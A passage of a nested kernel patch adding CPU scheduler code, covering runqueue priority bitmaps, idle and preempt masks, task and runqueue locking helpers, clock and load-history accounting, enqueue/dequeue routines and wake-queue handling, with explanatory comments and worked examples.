++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
++#endif
++static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
++
++/* task function */
++static inline const struct cpumask *task_user_cpus(struct task_struct *p)
++{
++	if (!p->user_cpus_ptr)
++		return cpu_possible_mask; /* &init_task.cpus_mask */
++	return p->user_cpus_ptr;
++}
++
++/* sched_queue related functions */
++static inline void sched_queue_init(struct sched_queue *q)
++{
++	int i;
++
++	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
++	for (i = 0; i < SCHED_BITS; i++)
++		INIT_LIST_HEAD(&q->heads[i]);
++}
++
++/*
++ * Initialize the idle task and put it into the queue structure of the rq.
++ * IMPORTANT: may be called multiple times for a single CPU.
++ */
++static inline void sched_queue_init_idle(struct sched_queue *q,
++					 struct task_struct *idle)
++{
++	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
++	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
++	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
++}
++
++static inline void
++clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static inline void
++set_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static atomic_t sched_prio_record = ATOMIC_INIT(0);
++
++/* watermark related functions */
++static inline void update_sched_preempt_mask(struct rq *rq)
++{
++	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_prio = rq->prio;
++	int cpu, pr;
++
++	if (prio == last_prio)
++		return;
++
++	rq->prio = prio;
++	cpu = cpu_of(rq);
++	pr = atomic_read(&sched_prio_record);
++
++	if (prio < last_prio) {
++		if (IDLE_TASK_SCHED_PRIO == last_prio) {
++			cpumask_clear_cpu(cpu, sched_idle_mask);
++			last_prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++			if (static_branch_likely(&sched_smt_present))
++				cpumask_andnot(&sched_sg_idle_mask,
++					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++#endif
++		}
++		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
++
++		return;
++	}
++	/* last_prio < prio */
++	if (IDLE_TASK_SCHED_PRIO == prio) {
++		cpumask_set_cpu(cpu, sched_idle_mask);
++		prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++		if (static_branch_likely(&sched_smt_present)) {
++			cpumask_t tmp;
++
++			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
++			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++				cpumask_or(&sched_sg_idle_mask,
++					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++		}
++#endif
++	}
++	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
++}
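++
++/*
++ * Descriptive note: when a CPU's highest runnable priority becomes
++ * IDLE_TASK_SCHED_PRIO (only the idle task is left), the CPU is added to
++ * sched_idle_mask above, and to sched_sg_idle_mask once every sibling in
++ * its SMT group is idle too; the opposite transition clears the bits
++ * again. select_task_rq() below consumes these masks.
++ */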
++
++/*
++ * This routine assumes that the idle task is always in the queue
++ */
++static inline struct task_struct *sched_rq_first_task(struct rq *rq)
++{
++	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++	return list_first_entry(head, struct task_struct, sq_node);
++}
++
++static inline struct task_struct *
++sched_rq_next_task(struct task_struct *p, struct rq *rq)
++{
++	unsigned long idx = p->sq_idx;
++	struct list_head *head = &rq->queue.heads[idx];
++
++	if (list_is_last(&p->sq_node, head)) {
++		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
++				    sched_idx2prio(idx, rq) + 1);
++		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++		return list_first_entry(head, struct task_struct, sq_node);
++	}
++
++	return list_next_entry(p, sq_node);
++}
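++
++/*
++ * Illustrative example: with bits 10 and 15 set in rq->queue.bitmap,
++ * find_first_bit() returns 10 (a lower bit index means a higher
++ * priority), so sched_rq_first_task() picks the head of the list that
++ * sched_prio2idx() maps bit 10 to; once that list is exhausted,
++ * sched_rq_next_task() advances to the list for bit 15 via
++ * find_next_bit().
++ */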
++
++static inline struct task_struct *rq_runnable_task(struct rq *rq)
++{
++	struct task_struct *next = sched_rq_first_task(rq);
++
++	if (unlikely(next == rq->skip))
++		next = sched_rq_next_task(next, rq);
++
++	return next;
++}
++
++/*
++ * Serialization rules:
++ *
++ * Lock order:
++ *
++ *   p->pi_lock
++ *     rq->lock
++ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
++ *
++ *  rq1->lock
++ *    rq2->lock  where: rq1 < rq2
++ *
++ * Regular state:
++ *
++ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
++ * local CPU's rq->lock; it optionally removes the task from the runqueue and
++ * always looks at the local rq data structures to find the most eligible task
++ * to run next.
++ *
++ * Task enqueue is also under rq->lock, possibly taken from another CPU.
++ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
++ * the local CPU to avoid bouncing the runqueue state around [ see
++ * ttwu_queue_wakelist() ]
++ *
++ * Task wakeup, specifically wakeups that involve migration, are horribly
++ * complicated to avoid having to take two rq->locks.
++ *
++ * Special state:
++ *
++ * System-calls and anything external will use task_rq_lock() which acquires
++ * both p->pi_lock and rq->lock. As a consequence the state they change is
++ * stable while holding either lock:
++ *
++ *  - sched_setaffinity()/
++ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
++ *  - set_user_nice():		p->se.load, p->*prio
++ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
++ *				p->se.load, p->rt_priority,
++ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
++ *  - sched_setnuma():		p->numa_preferred_nid
++ *  - sched_move_task():        p->sched_task_group
++ *  - uclamp_update_active()	p->uclamp*
++ *
++ * p->state <- TASK_*:
++ *
++ *   is changed locklessly using set_current_state(), __set_current_state() or
++ *   set_special_state(), see their respective comments, or by
++ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
++ *   concurrent self.
++ *
++ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
++ *
++ *   is set by activate_task() and cleared by deactivate_task(), under
++ *   rq->lock. Non-zero indicates the task is runnable, the special
++ *   ON_RQ_MIGRATING state is used for migration without holding both
++ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
++ *
++ * p->on_cpu <- { 0, 1 }:
++ *
++ *   is set by prepare_task() and cleared by finish_task() such that it will be
++ *   set before p is scheduled-in and cleared after p is scheduled-out, both
++ *   under rq->lock. Non-zero indicates the task is running on its CPU.
++ *
++ *   [ The astute reader will observe that it is possible for two tasks on one
++ *     CPU to have ->on_cpu = 1 at the same time. ]
++ *
++ * task_cpu(p): is changed by set_task_cpu(), the rules are:
++ *
++ *  - Don't call set_task_cpu() on a blocked task:
++ *
++ *    We don't care what CPU we're not running on, this simplifies hotplug,
++ *    the CPU assignment of blocked tasks isn't required to be valid.
++ *
++ *  - for try_to_wake_up(), called under p->pi_lock:
++ *
++ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
++ *
++ *  - for migration called under rq->lock:
++ *    [ see task_on_rq_migrating() in task_rq_lock() ]
++ *
++ *    o move_queued_task()
++ *    o detach_task()
++ *
++ *  - for migration called under double_rq_lock():
++ *
++ *    o __migrate_swap_task()
++ *    o push_rt_task() / pull_rt_task()
++ *    o push_dl_task() / pull_dl_task()
++ *    o dl_task_offline_migration()
++ *
++ */
++
++/*
++ * Context: p->pi_lock
++ */
++static inline struct rq
++*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock(&rq->lock);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock(&rq->lock);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			*plock = NULL;
++			return rq;
++		}
++	}
++}
++
++static inline void
++__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
++{
++	if (NULL != lock)
++		raw_spin_unlock(lock);
++}
++
++static inline struct rq
++*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
++			  unsigned long *flags)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock_irqsave(&rq->lock, *flags);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&rq->lock, *flags);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			raw_spin_lock_irqsave(&p->pi_lock, *flags);
++			if (likely(!p->on_cpu && !p->on_rq &&
++				   rq == task_rq(p))) {
++				*plock = &p->pi_lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
++		}
++	}
++}
++
++static inline void
++task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
++			      unsigned long *flags)
++{
++	raw_spin_unlock_irqrestore(lock, *flags);
++}
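++
++/*
++ * Typical usage of the access-lock helpers above (sketch):
++ *
++ *	raw_spinlock_t *lock;
++ *	unsigned long flags;
++ *	struct rq *rq = task_access_lock_irqsave(p, &lock, &flags);
++ *
++ *	... examine or update p's scheduling state ...
++ *
++ *	task_access_unlock_irqrestore(p, lock, &flags);
++ */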
++
++/*
++ * __task_rq_lock - lock the rq @p resides on.
++ */
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	lockdep_assert_held(&p->pi_lock);
++
++	for (;;) {
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
++			return rq;
++		raw_spin_unlock(&rq->lock);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++/*
++ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
++ */
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	for (;;) {
++		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		/*
++		 *	move_queued_task()		task_rq_lock()
++		 *
++		 *	ACQUIRE (rq->lock)
++		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
++		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
++		 *	[S] ->cpu = new_cpu		[L] task_rq()
++		 *					[L] ->on_rq
++		 *	RELEASE (rq->lock)
++		 *
++		 * If we observe the old CPU in task_rq_lock(), the acquire of
++		 * the old rq->lock will fully serialize against the stores.
++		 *
++		 * If we observe the new CPU in task_rq_lock(), the address
++		 * dependency headed by '[L] rq = task_rq()' and the acquire
++		 * will pair with the WMB to ensure we then also see migrating.
++		 */
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
++			return rq;
++		}
++		raw_spin_unlock(&rq->lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++static inline void
++rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irqsave(&rq->lock, rf->flags);
++}
++
++static inline void
++rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
++}
++
++void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
++{
++	raw_spinlock_t *lock;
++
++	/* Matches synchronize_rcu() in __sched_core_enable() */
++	preempt_disable();
++
++	for (;;) {
++		lock = __rq_lockp(rq);
++		raw_spin_lock_nested(lock, subclass);
++		if (likely(lock == __rq_lockp(rq))) {
++			/* preempt_count *MUST* be > 1 */
++			preempt_enable_no_resched();
++			return;
++		}
++		raw_spin_unlock(lock);
++	}
++}
++
++void raw_spin_rq_unlock(struct rq *rq)
++{
++	raw_spin_unlock(rq_lockp(rq));
++}
++
++/*
++ * RQ-clock updating methods:
++ */
++
++static void update_rq_clock_task(struct rq *rq, s64 delta)
++{
++/*
++ * In theory, the compiler should just see 0 here, and optimize out the call
++ * to sched_rt_avg_update. But I don't trust it...
++ */
++	s64 __maybe_unused steal = 0, irq_delta = 0;
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
++
++	/*
++	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
++	 * this case when a previous update_rq_clock() happened inside a
++	 * {soft,}irq region.
++	 *
++	 * When this happens, we stop ->clock_task and only update the
++	 * prev_irq_time stamp to account for the part that fit, so that a next
++	 * update will consume the rest. This ensures ->clock_task is
++	 * monotonic.
++	 *
++	 * It does however cause some slight misattribution of {soft,}irq
++	 * time, a more accurate solution would be to update the irq_time using
++	 * the current rq->clock timestamp, except that would require using
++	 * atomic ops.
++	 */
++	if (irq_delta > delta)
++		irq_delta = delta;
++
++	rq->prev_irq_time += irq_delta;
++	delta -= irq_delta;
++	psi_account_irqtime(rq->curr, irq_delta);
++#endif
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	if (static_key_false((&paravirt_steal_rq_enabled))) {
++		steal = paravirt_steal_clock(cpu_of(rq));
++		steal -= rq->prev_steal_time_rq;
++
++		if (unlikely(steal > delta))
++			steal = delta;
++
++		rq->prev_steal_time_rq += steal;
++		delta -= steal;
++	}
++#endif
++
++	rq->clock_task += delta;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	if ((irq_delta + steal))
++		update_irq_load_avg(rq, irq_delta + steal);
++#endif
++}
++
++static inline void update_rq_clock(struct rq *rq)
++{
++	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
++
++	if (unlikely(delta <= 0))
++		return;
++	rq->clock += delta;
++	update_rq_time_edge(rq);
++	update_rq_clock_task(rq, delta);
++}
++
++/*
++ * RQ Load update routine
++ */
++#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
++#define RQ_UTIL_SHIFT			(8)
++#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
++
++#define LOAD_BLOCK(t)		((t) >> 17)
++#define LOAD_HALF_BLOCK(t)	((t) >> 16)
++#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
++#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
++#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
++
++static inline void rq_load_update(struct rq *rq)
++{
++	u64 time = rq->clock;
++	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
++			RQ_LOAD_HISTORY_BITS - 1);
++	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
++	u64 curr = !!rq->nr_running;
++
++	if (delta) {
++		rq->load_history = rq->load_history >> delta;
++
++		if (delta < RQ_UTIL_SHIFT) {
++			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
++			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
++				rq->load_history ^= LOAD_BLOCK_BIT(delta);
++		}
++
++		rq->load_block = BLOCK_MASK(time) * prev;
++	} else {
++		rq->load_block += (time - rq->load_stamp) * prev;
++	}
++	if (prev ^ curr)
++		rq->load_history ^= CURRENT_LOAD_BIT;
++	rq->load_stamp = time;
++}
++
++unsigned long rq_load_util(struct rq *rq, unsigned long max)
++{
++	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
++}
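++
++/*
++ * Worked example (assuming max = 1024): RQ_LOAD_HISTORY_TO_UTIL() takes
++ * the eight history bits just below the MSB, i.e. (load_history >> 23)
++ * & 0xff.  With load_history = 0x0F000000 that yields 30, so
++ * rq_load_util() returns 30 * (1024 >> 8) = 120, roughly 12% of the
++ * given capacity.
++ */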
++
++#ifdef CONFIG_SMP
++unsigned long sched_cpu_util(int cpu)
++{
++	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
++}
++#endif /* CONFIG_SMP */
++
++#ifdef CONFIG_CPU_FREQ
++/**
++ * cpufreq_update_util - Take a note about CPU utilization changes.
++ * @rq: Runqueue to carry out the update for.
++ * @flags: Update reason flags.
++ *
++ * This function is called by the scheduler on the CPU whose utilization is
++ * being updated.
++ *
++ * It can only be called from RCU-sched read-side critical sections.
++ *
++ * The way cpufreq is currently arranged requires it to evaluate the CPU
++ * performance state (frequency/voltage) on a regular basis to prevent it from
++ * being stuck in a completely inadequate performance level for too long.
++ * That is not guaranteed to happen if the updates are only triggered from CFS
++ * and DL, though, because they may not be coming in if only RT tasks are
++ * active all the time (or there are RT tasks only).
++ *
++ * As a workaround for that issue, this function is called periodically by the
++ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
++ * but that really is a band-aid.  Going forward it should be replaced with
++ * solutions targeted more specifically at RT tasks.
++ */
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++	struct update_util_data *data;
++
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
++						  cpu_of(rq)));
++	if (data)
++		data->func(data, rq_clock(rq), flags);
++}
++#else
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++}
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++/*
++ * Tick may be needed by tasks in the runqueue depending on their policy and
++ * requirements. If tick is needed, let's send the target an IPI to kick it out
++ * of nohz mode if necessary.
++ */
++static inline void sched_update_tick_dependency(struct rq *rq)
++{
++	int cpu = cpu_of(rq);
++
++	if (!tick_nohz_full_cpu(cpu))
++		return;
++
++	if (rq->nr_running < 2)
++		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
++	else
++		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
++}
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_update_tick_dependency(struct rq *rq) { }
++#endif
++
++bool sched_task_on_rq(struct task_struct *p)
++{
++	return task_on_rq_queued(p);
++}
++
++unsigned long get_wchan(struct task_struct *p)
++{
++	unsigned long ip = 0;
++	unsigned int state;
++
++	if (!p || p == current)
++		return 0;
++
++	/* Only get wchan if task is blocked and we can keep it that way. */
++	raw_spin_lock_irq(&p->pi_lock);
++	state = READ_ONCE(p->__state);
++	smp_rmb(); /* see try_to_wake_up() */
++	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
++		ip = __get_wchan(p);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	return ip;
++}
++
++/*
++ * Add/Remove/Requeue task to/from the runqueue routines
++ * Context: rq->lock
++ */
++#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
++	sched_info_dequeue(rq, p);						\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
++										\
++	list_del(&p->sq_node);							\
++	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
++		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
++	sched_info_enqueue(rq, p);					\
++	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
++									\
++	p->sq_idx = task_sched_prio_idx(p, rq);				\
++	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
++	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_DEQUEUE_TASK(p, rq, flags);
++	--rq->nr_running;
++#ifdef CONFIG_SMP
++	if (1 == rq->nr_running)
++		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_ENQUEUE_TASK(p, rq, flags);
++	update_sched_preempt_mask(rq);
++	++rq->nr_running;
++#ifdef CONFIG_SMP
++	if (2 == rq->nr_running)
++		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
++{
++	lockdep_assert_held(&rq->lock);
++	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
++		  cpu_of(rq), task_cpu(p));
++
++	list_del(&p->sq_node);
++	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++	if (idx != p->sq_idx) {
++		if (list_empty(&rq->queue.heads[p->sq_idx]))
++			clear_bit(sched_idx2prio(p->sq_idx, rq),
++				  rq->queue.bitmap);
++		p->sq_idx = idx;
++		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++		update_sched_preempt_mask(rq);
++	}
++}
++
++/*
++ * cmpxchg based fetch_or, macro so it works for different integer types
++ */
++#define fetch_or(ptr, mask)						\
++	({								\
++		typeof(ptr) _ptr = (ptr);				\
++		typeof(mask) _mask = (mask);				\
++		typeof(*_ptr) _val = *_ptr;				\
++									\
++		do {							\
++		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
++	_val;								\
++})
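++
++/*
++ * Semantically, fetch_or() is an atomic version of this sketch:
++ *
++ *	old = *ptr;
++ *	*ptr = old | mask;
++ *	return old;
++ *
++ * with the try_cmpxchg() loop retrying until no other CPU has raced.
++ */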
++
++#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
++/*
++ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
++ * this avoids any races wrt polling state changes and thereby avoids
++ * spurious IPIs.
++ */
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
++}
++
++/*
++ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
++ *
++ * If this returns true, then the idle task promises to call
++ * sched_ttwu_pending() and reschedule soon.
++ */
++static bool set_nr_if_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	typeof(ti->flags) val = READ_ONCE(ti->flags);
++
++	for (;;) {
++		if (!(val & _TIF_POLLING_NRFLAG))
++			return false;
++		if (val & _TIF_NEED_RESCHED)
++			return true;
++		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
++			break;
++	}
++	return true;
++}
++
++#else
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	set_tsk_need_resched(p);
++	return true;
++}
++
++#ifdef CONFIG_SMP
++static inline bool set_nr_if_polling(struct task_struct *p)
++{
++	return false;
++}
++#endif
++#endif
++
++static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	struct wake_q_node *node = &task->wake_q;
++
++	/*
++	 * Atomically grab the task, if ->wake_q is !nil already it means
++	 * it's already queued (either by us or someone else) and will get the
++	 * wakeup due to that.
++	 *
++	 * In order to ensure that a pending wakeup will observe our pending
++	 * state, even in the failed case, an explicit smp_mb() must be used.
++	 */
++	smp_mb__before_atomic();
++	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
++		return false;
++
++	/*
++	 * The head is context local, there can be no concurrency.
++	 */
++	*head->lastp = node;
++	head->lastp = &node->next;
++	return true;
++}
++
++/**
++ * wake_q_add() - queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ */
++void wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	if (__wake_q_add(head, task))
++		get_task_struct(task);
++}
++
++/**
++ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ *
++ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
++ * that already hold reference to @task can call the 'safe' version and trust
++ * wake_q to do the right thing depending whether or not the @task is already
++ * queued for wakeup.
++ */
++void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
++{
++	if (!__wake_q_add(head, task))
++		put_task_struct(task);
++}
++
++void wake_up_q(struct wake_q_head *head)
++{
++	struct wake_q_node *node = head->first;
++
++	while (node != WAKE_Q_TAIL) {
++		struct task_struct *task;
++
++		task = container_of(node, struct task_struct, wake_q);
++		/* task can safely be re-inserted now: */
++		node = node->next;
++		task->wake_q.next = NULL;
++
++		/*
++		 * wake_up_process() executes a full barrier, which pairs with
++		 * the queueing in wake_q_add() so as not to miss wakeups.
++		 */
++		wake_up_process(task);
++		put_task_struct(task);
++	}
++}
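++
++/*
++ * Usage pattern (sketch): callers typically batch wakeups while holding
++ * a lock and issue them after dropping it:
++ *
++ *	DEFINE_WAKE_Q(head);
++ *	...
++ *	wake_q_add(&head, task);	(under some lock)
++ *	...
++ *	wake_up_q(&head);		(after the lock is dropped)
++ */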
++
++/*
++ * resched_curr - mark rq's current task 'to be rescheduled now'.
++ *
++ * On UP this means the setting of the need_resched flag, on SMP it
++ * might also involve a cross-CPU call to trigger the scheduler on
++ * the target CPU.
++ */
++void resched_curr(struct rq *rq)
++{
++	struct task_struct *curr = rq->curr;
++	int cpu;
++
++	lockdep_assert_held(&rq->lock);
++
++	if (test_tsk_need_resched(curr))
++		return;
++
++	cpu = cpu_of(rq);
++	if (cpu == smp_processor_id()) {
++		set_tsk_need_resched(curr);
++		set_preempt_need_resched();
++		return;
++	}
++
++	if (set_nr_and_not_polling(curr))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++void resched_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (cpu_online(cpu) || cpu == smp_processor_id())
++		resched_curr(cpu_rq(cpu));
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++}
++
++#ifdef CONFIG_SMP
++#ifdef CONFIG_NO_HZ_COMMON
++void nohz_balance_enter_idle(int cpu) {}
++
++void select_nohz_load_balancer(int stop_tick) {}
++
++void set_cpu_sd_state_idle(void) {}
++
++/*
++ * In the semi-idle case, use the nearest busy CPU for migrating timers
++ * from an idle CPU.  This is good for power-savings.
++ *
++ * We don't do a similar optimization for a completely idle system, as
++ * selecting an idle CPU will add more delays to the timers than intended
++ * (as that CPU's timer base may not be up to date wrt jiffies etc).
++ */
++int get_nohz_timer_target(void)
++{
++	int i, cpu = smp_processor_id(), default_cpu = -1;
++	struct cpumask *mask;
++	const struct cpumask *hk_mask;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
++		if (!idle_cpu(cpu))
++			return cpu;
++		default_cpu = cpu;
++	}
++
++	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
++
++	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
++		for_each_cpu_and(i, mask, hk_mask)
++			if (!idle_cpu(i))
++				return i;
++
++	if (default_cpu == -1)
++		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
++	cpu = default_cpu;
++
